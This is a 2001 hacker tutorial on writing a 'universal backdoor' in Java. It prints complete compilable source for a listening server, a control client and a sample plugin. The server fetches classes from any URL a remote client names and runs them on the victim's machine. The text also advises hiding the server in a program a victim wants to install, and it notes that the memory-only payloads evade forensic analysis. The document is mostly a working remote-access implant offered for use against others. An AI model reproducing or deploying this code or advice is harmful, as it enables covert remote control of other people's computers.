Writing an universal backdoor by existenz ( 03-01-2001 ) In this article i want to discuss a "new" approach to writing a backdoor. 1) The idea ! The idea is to write a simple ( but universal ) backdoor, that is able to perform ANY TASK without knowing ( at the time it is written and installed ) which TASKS it will perform in the future. The backdoor will be very small, containing no coded functionality, but being able to be used for any purpose you don't even know of when you install the backdoor on the victim's PC. Plugin mechanism may be a better description for this kind of backdoor, because anytime your victim is online, you can "plugin" some "feature" and run it on his machine. This article will focus on the underlying concept, not on the implementation of all the possible "features". It's an article for people who want to programm a backdoor. Nevertheless it will present a simple ready-to-run backdoor that you just have to compile and install. AND: I will use Java as the programming language ! 2) Why Java ? The answer is simple: Java is a platform independent, "write once, run anywhere" language. No matter if u want to install your programm on a Windows, Linux, Unix, Mac ... OS. The only thing you need ( and what is most often already installed ) is a Java runtime. The Java runtimes are free. You can get them at http://java.sun.com Java is THE "internet language", which means it is a very powerfull networking language. I don't want to discuss the advantages and disadvantages of Java here. I know that there are things you can't ( or don't want to ) do in Java. Ok, then use C/C++ ! ( Or use the Java Native Interface JNI to call C/C++ from Java or Java from C/C++ ) Only one more thing: Java isn't ( anymore ) as slow as it is ( was ) supposed to be. [ Since J2SE 1.3 ( Java 2 Standard edition ) introduced the HotSpot JIT ( Just in Time Compiler ). ] You don't need to be a Java programmer to understand the concepts of this article. Yet some ( object oriented ) programming experience is needed to follow the examples. If you want to learn more about Java, i found the book "Go To Java 2" by Guido Krüger ( Addison-Wesley ) a good one to start ( it also covers some network programming ! ). 3) How this will be done ! The backdoor will be composed out of 3 parts: -> A server -> A plugin ( that will do the actual job ) -> A client The server will do nothing but listen for a client and load a plugin if told to do so by a client. The client will be able to connect to a server and tell him what plugin to use and where to find it on the net. The plugin will contain the actual code of the things to do. The server will use the ClassLoader technology of java. This means the server doesnt know of the features it will load and execute. The server will be able to load any object you write, from anywhere on the internet. Once loaded the PlugIn will be run in a Thread and the server will go on, listening for clients. The plugin(s) can be any Java object you write. It just has to implement the Runnable interface. 3a) What is a ClassLoader ? Java is object oriented. Anything is based on classes and objects. When you use a Java object, the runtime loads the corresponding class automaticaly, using a ClassLoader. Core API classes like String, Integer ... ( and many more ! ) are already provided in the runtime. When you write an applet and a browser loads it from your web site, the browser's runtime uses a ClassLoader to load the classes you have written ( which cant' be found on the local machine ) from a directory on your web server. But you can also easely use a ClassLoader to load classes from anywhere on the internet! 3b) What is an interface ? Let's make it short: The interface Runnable assures that the plugin(s) can be run in a Thread and that they all contain the method run() ( which will be invoked by the server ). To learn more about interfaces get a book about Java. 4) Let's do it ! Now let's do some coding! Here's the server: ( The listing seems to be long, but actually there are more lines of comments than lines of code ! So read the comments ! ) ---------------------------------------------------------------------------------------------- // First let's import all the classes needed import java.io.InputStream; import java.net.Socket; import java.net.ServerSocket; import java.net.URL; import java.net.URLClassLoader; // The BackDoorServer implements Runnable, which means it will be run // in a Thread public class BackDoorServer implements Runnable { // The port the server will listen and a variable // where the inputs will be stored int srvPort; int inputChar; // The ServerSocket and the Socket that will do // the communication ServerSocket serverDoor; Socket commSocket; // The dafault constructor will build a Server on port 2323 public BackDoorServer() { this( 2323 ); } // Use this contructor if you want to run the server on a different port public BackDoorServer( int port ) { srvPort = port; // Make the server run in a Thread Thread theDoor = new Thread( this ); // Starts the Thread and invokes the method run() theDoor.start(); } // Let it all begin ! public void run() { try { // Initialize a server on the Port set by the contructor serverDoor = new ServerSocket( srvPort ); // Listen till the client kills you! boolean alive = true; while( alive ) { // Build the communication socket // This method will BLOCK until a client connects // to the server ! // That is why we need a Thread commSocket = serverDoor.accept(); // Get an InputStream to read from the Socket InputStream in = commSocket.getInputStream(); // Build a StringBuffer to store the input // By default we assume the input to be no longer than // 128 bytes StringBuffer line = new StringBuffer( 128 ); // Now read the input from the client and store it // in the StringBuffer while( (inputChar = in.read()) != -1 ) line.append( "" + ( char ) inputChar ); // Convert the StringBuffer into a String String lines = line.toString(); // What was the input ? if( lines.equals( "RIP!" ) ) { // Oh NO! The client killed me :( // Shut down the BackDoorServer alive = false; } else { // Hey! The client told me to load a "PlugIn" // Let's try it ! try { // See the client documentation for the format // of the commands // The next 3 lines seperate the PlugIn location from // the PlugInName int seperator = lines.indexOf( "*" ); String plugInLoc = lines.substring( 0, seperator ); String plugInName = lines.substring( seperator + 1, lines.length() ); // Where in the whole wide world do we find our PlugIn ? URL[] urlsToLoadFrom = new URL[] { new URL( plugInLoc ) }; // From whereever, we will get it using a ClassLoader URLClassLoader plugInLoader = new URLClassLoader( urlsToLoadFrom ); // Now get the Class the Client told you to get ! Class plugIn = Class.forName( plugInName, true, plugInLoader ); // Make the PlugIn run in a Thread // ( see "What is an interface?" ) //and .... Thread plugInT = new Thread(( Runnable ) plugIn.newInstance()); // RUN IT! plugInT.run(); // We don' need that anymore ... plugInName = null; plugInLoc = null; } catch( Throwable t ) { // An error occured ! .. SHIT! // but, nevertheless .. lets ignore it ! :) // just go on and listen for another try ! } } // OK! the PlugIn is running .. so go on and listen // for another one in.close(); line = null; lines = null; } // Oh no .. we are dead ... so close the Sockets serverDoor.close(); commSocket.close(); } catch ( Throwable t ) { // Any error occured ! .. SHIT! // but, nevertheless .. lets ignore it again ! :) } } } ---------------------------------------------------------------------------------------------- That's all ! save it as BackDoorServer.java and compile it: javac BackDoorServer.java To install the server you can use any java utility you write. Just instantiate an object of the type BackDoorServer and call one of the constructors. To illustrate how it works lets write a simple programm that does nothing but implement a server: ---------------------------------------------------------------------------------------------- public class DoNothing { // The main method will be called first when excuted public static void main( String args[] ) { try { // Just implement the server ... BackDoorServer test = new BackDoorServer(); // Because we use the default constructor the server will listen on port 2323 // Here u could do anything that makes this Prog // a Prog your victim really wants to install and run :) } catch( Throwable t ) { // Hey ! .. What's an error ? } } } ---------------------------------------------------------------------------------------------- Save it as DoNothing.java, compile it: javac BackDoorServer.java and run it: java DoNothing Now the server runs on port 2323 on your machine! So let's write a simple client: ---------------------------------------------------------------------------------------------- // Import all the classes we need import java.io.OutputStream; import java.net.Socket; public class BackDoorClient { // This method will be called first // The format is: java BackDoorClient // ??? ok an example: // // java BackDoorClient localhost 2323 http://e-xistenz.net/*WindowPlugIn // // This will cause the client to connect to a server on your own machine on port 2323 // and make the server load the class WindowPlugIn from my website // NOTE: 1) The location and the name of the PlugIn are seperated by "*" // 2) The / before the * is important to tell the URLClassLoader to // search in the Directory ! public static void main( String args[] ) { try { // Get the command line parameters String server = args[ 0 ]; int port = ( new Integer( args[ 1 ] ) ).intValue(); String command = args[ 2 ]; // Connect to the server and get the OutPutStream to tell the // server what to do Socket clientSocket = new Socket( server, port ); OutputStream out = clientSocket.getOutputStream(); // Communicate with the server out.write( command.getBytes() ); // That's it ! ... Close everything before we leave out.close(); clientSocket.close(); } catch( Throwable t ) { // Ok ... display the error information t.printStackTrace(); } } } ---------------------------------------------------------------------------------------------- Save it as BackDoorClient.java, start another shell window, compile the class: javac BackDoorClient.java and run it: NOTE: You have to be connected to the internet to run it, because the server loads the plugin from my website! See the section about the WindowPlugIn if you want to know how to test it localy on your machine. java BackDoorClient localhost 2323 http://e-xistenz.net/*WindowPlugIn Cool ! The Server loaded the class WindowPlugIn from my webpage and executed it ! Execute it again .. another window will appear ! Remember: Threads are used ! Now, let's kill the server: java BackDoorClient localhost 2323 RIP! The server shuts down ! Another attempt to run the client and connexct to the server, will cause an error, because the server isnt listening anymore. I know the server task doesnt stop .. thats because the threads are still running, but as i mentioned before: This is an article about the underlying concept, not about the best implementation. Ok, but what does the WindowPlugIn look like ? Here's the code: ---------------------------------------------------------------------------------------------- import java.awt.Frame; // The only thing your plugin must do is to // implement Runnable public class WindowPlugIn implements Runnable { // Here the work starts public void run() { // You can write any plugin ... // No matter what is does, it will work with the server ! // In this example just pop up a window Frame plugInFrame = new Frame( "Hello victim!" ); plugInFrame.setSize( 256, 64 ); plugInFrame.setVisible( true ); } } ---------------------------------------------------------------------------------------------- Now you can write any class, doing anything you want, store it on any server in the net and execute it on your victims machine by simply telling the backdoor which "feature" to load and where to find it. When you write your own plugins, compile them and place them in the same directory as your ( local ) running ( test- )server. Then run the client using: java BackDoorClient localhost 2323 file:* Now the server will load the plugin from your local machine. 5) Why all this ? There's a great advantage about this concept: Whatever you make your victim's machine do, it CANT be reconstructed or analysed ! You load the "features" at runtime and they only reside in the MEMORY of your victim's PC ,until their work is done. There's no "backdoor code" on the victims machine that can be blamed for the actions your "plugin" performed. Moreover: You can load your plugin from anywhere on the internet ! It does not have to be loaded from your own PC ! 6) The future ! Why not write more plugins, building a "central library" somwhere on the net anyone can use ? Why not write a better server, handling more commands, or even giving back return codes ? Why not write a GUI client, also able to do some ip scanning ? Maybe ill spend some more time on this. Feel free to contact me at existent@e-xistenz.net for questions or comments. And visit my website www.e-istenz.net ( still under construction ) to get some cool Java tools. existenz 03-01-2001